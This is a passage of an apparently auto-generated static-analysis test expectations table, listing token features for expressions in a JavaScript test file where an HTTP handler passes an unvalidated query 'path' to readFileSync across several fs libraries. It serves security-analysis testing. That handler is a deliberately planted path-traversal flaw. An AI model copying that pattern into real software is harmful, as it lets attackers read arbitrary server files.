original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | require ... e(true) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | require ... e(true) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | require ... e(true) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | require ... e(true) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:41 | require ... e(true) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:54 | require ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:54 | require ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:54 | require ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:54 | require ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:54 | require ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | exceptional return of require ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | exceptional return of require ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | exceptional return of require ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | exceptional return of require ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | exceptional return of require ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | require ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | require ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | require ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | require ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:3:19:60 | require ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:19:11:19:26 | "./my-fs-module" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:19:11:19:26 | "./my-fs-module" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:19:11:19:26 | "./my-fs-module" | calleeImports | | @@ -9896,6 +80452,24 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:19:11:19:26 | "./my-fs-module" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:19:11:19:26 | "./my-fs-module" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:19:11:19:26 | "./my-fs-module" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:29:19:35 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:29:19:35 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:29:19:35 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:29:19:35 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:29:19:35 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | CalleeFlexibleAccessPath | import("p").require | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | InputArgumentIndex | 0 | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | calleeImports | ./my-fs-module | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:37:19:40 | true | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:19:43:19:54 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:43:19:54 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:19:43:19:54 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:19:43:19:54 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:19:43:19:54 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:19:56:19:59 | path | CalleeFlexibleAccessPath | import("p").require().readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:19:56:19:59 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:19:56:19:59 | path | calleeImports | ./my-fs-module | @@ -9904,6 +80478,51 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:19:56:19:59 | path | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:19:56:19:59 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:19:56:19:59 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:21:24 | flexibleModuleName | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:21:24 | flexibleModuleName | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:21:24 | flexibleModuleName | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:21:24 | flexibleModuleName | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:21:24 | flexibleModuleName | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibl ... : "fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibl ... : "fs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibl ... : "fs") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibl ... : "fs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibl ... : "fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibleModuleName | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibleModuleName | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibleModuleName | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibleModuleName | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:7:23:11 | flexibleModuleName | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:21:34 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:21:34 | require | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:21:34 | require | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:21:34 | require | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:21:34 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | exceptional return of require ... : "fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | exceptional return of require ... : "fs") | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | exceptional return of require ... : "fs") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | exceptional return of require ... : "fs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | exceptional return of require ... : "fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | require ... : "fs") | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | require ... : "fs") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | require ... : "fs") | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | require ... : "fs") | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:28:23:11 | require ... : "fs") | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:42 | process | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:42 | process | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:42 | process | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:42 | process | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:42 | process | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:51 | process.versions | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:51 | process.versions | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:51 | process.versions | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:51 | process.versions | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:51 | process.versions | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:63 | process ... ctron"] | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:63 | process ... ctron"] | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:63 | process ... ctron"] | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:63 | process ... ctron"] | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:36:21:63 | process ... ctron"] | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:21:36:23:10 | process ... : "fs" | CalleeFlexibleAccessPath | require | | autogenerated/TaintedPath/other-fs-libraries.js:21:36:23:10 | process ... : "fs" | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:21:36:23:10 | process ... : "fs" | calleeImports | | @@ -9912,6 +80531,51 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:21:36:23:10 | process ... : "fs" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | | autogenerated/TaintedPath/other-fs-libraries.js:21:36:23:10 | process ... : "fs" | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:21:36:23:10 | process ... : "fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:44:21:51 | versions | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:44:21:51 | versions | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:44:21:51 | versions | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:44:21:51 | versions | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:44:21:51 | versions | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:21:53:21:62 | "electron" | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:53:21:62 | "electron" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:21:53:21:62 | "electron" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:21:53:21:62 | "electron" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:21:53:21:62 | "electron" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:22:7:22:19 | "original-fs" | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:22:7:22:19 | "original-fs" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:22:7:22:19 | "original-fs" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:22:7:22:19 | "original-fs" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:22:7:22:19 | "original-fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:23:7:23:10 | "fs" | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:23:7:23:10 | "fs" | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:23:7:23:10 | "fs" | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:23:7:23:10 | "fs" | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:23:7:23:10 | "fs" | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:20 | flexibleModuleName | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:20 | flexibleModuleName | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:20 | flexibleModuleName | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:20 | flexibleModuleName | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:20 | flexibleModuleName | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:33 | flexibl ... ileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:33 | flexibl ... ileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:33 | flexibl ... ileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:33 | flexibl ... ileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:33 | flexibl ... ileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | exceptional return of flexibl ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | exceptional return of flexibl ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | exceptional return of flexibl ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | exceptional return of flexibl ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | exceptional return of flexibl ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | flexibl ... c(path) | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | flexibl ... c(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | flexibl ... c(path) | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | flexibl ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:24:3:24:39 | flexibl ... c(path) | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:24:22:24:33 | readFileSync | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:22:24:33 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/other-fs-libraries.js:24:22:24:33 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path fs readFileSync path gracefulFs readFileSync path fsExtra readFileSync path originalFs readFileSync path getFsModule true readFileSync path getFsModule false readFileSync path require ./my-fs-module require true readFileSync path flexibleModuleName require process electron versions electron original-fs fs flexibleModuleName readFileSync path | +| autogenerated/TaintedPath/other-fs-libraries.js:24:22:24:33 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/other-fs-libraries.js:24:22:24:33 | readFileSync | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:24:35:24:38 | path | CalleeFlexibleAccessPath | flexibleModuleName.readFileSync | | autogenerated/TaintedPath/other-fs-libraries.js:24:35:24:38 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/other-fs-libraries.js:24:35:24:38 | path | calleeImports | | @@ -9921,6 +80585,71 @@ tokenFeatures | autogenerated/TaintedPath/other-fs-libraries.js:24:35:24:38 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/other-fs-libraries.js:24:35:24:38 | path | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | | autogenerated/TaintedPath/other-fs-libraries.js:24:35:24:38 | path | receiverName | flexibleModuleName | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | require | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | require | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | require | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | require | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | require | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http mkdirp original-fs pify read-pkg thenify url util util.promisify | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | this | contextFunctionInterfaces | getFsModule(special) | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | this | enclosingFunctionBody | special special require fs require original-fs | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | this | enclosingFunctionName | getFsModule | +| autogenerated/TaintedPath/other-fs-libraries.js:27:1:27:0 | this | fileImports | ./my-async-fs-module ./my-fs-module bluebird fs fs-extra graceful-fs http 